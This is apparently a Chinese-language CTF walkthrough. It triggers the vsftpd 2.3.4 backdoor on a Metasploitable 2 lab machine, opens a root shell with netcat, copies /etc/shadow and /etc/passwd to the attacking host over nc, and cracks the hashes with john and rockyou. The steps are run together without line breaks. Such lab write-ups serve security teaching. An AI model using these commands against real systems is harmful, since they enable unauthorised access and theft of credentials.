从存在漏洞的 Metasploitable 2 服务器中获取解密后的 /etc/shadow 和 /etc/passwd 文件。
对于本次 CTF,我们使用 VMware Workstation Pro 运行两台虚拟机。我们以 Kali Linux 作为攻击机,以 Metasploitable 2 作为存在漏洞的机器。
Open a Virtual Machine 选项,然后选择解压后的 Kali Linux 文件open 选项,然后选择解压后的 Metasploitable 2 文件Play virtual machine 按钮I moved It 或 I copied It 选项时,选择 I copied It 选项kali 作为用户名和密码登录 Kali Linuxmsfadmin 作为用户名和密码登录 Metasploitableip addr show 并记录 inet 部分的 IP 地址麻省理工学院研究与工程公司(MITRE)将 CVE-2011-2523 详细描述为一种常见漏洞和暴露,其中 vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp。
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:) 结尾的字符串,输入 user <string>:)pass <string> nc -v <vulnerable-machine-ip-address> 6200ip addr show 显示当前连接的 IP 地址whoami 显示已授予 root 访问权限/etc/shadow 和 /etc/passwd 文件复制到另一个文件cp /etc/shadow shadow.txtcp /etc/passwd passwd.txtip addr show 查找 inet 下的 IP 地址nc -l -p 1234 > shadow.txt 监听文件nc -w 3 <destination-ip> 1234 < shadow.txtJohn 工具格式unshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input 查看文件,其中应保存有用户名和密码John 命令和字典解密 shadow 文件rockyou.txt 通过 john 破解哈希sudo gzip -d /usr/share/wordlists/rockyou.txt.gz 解压字典文件kalijohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt 还原(破解)密码哈希john –show unshadowed-input 查看已破解的密码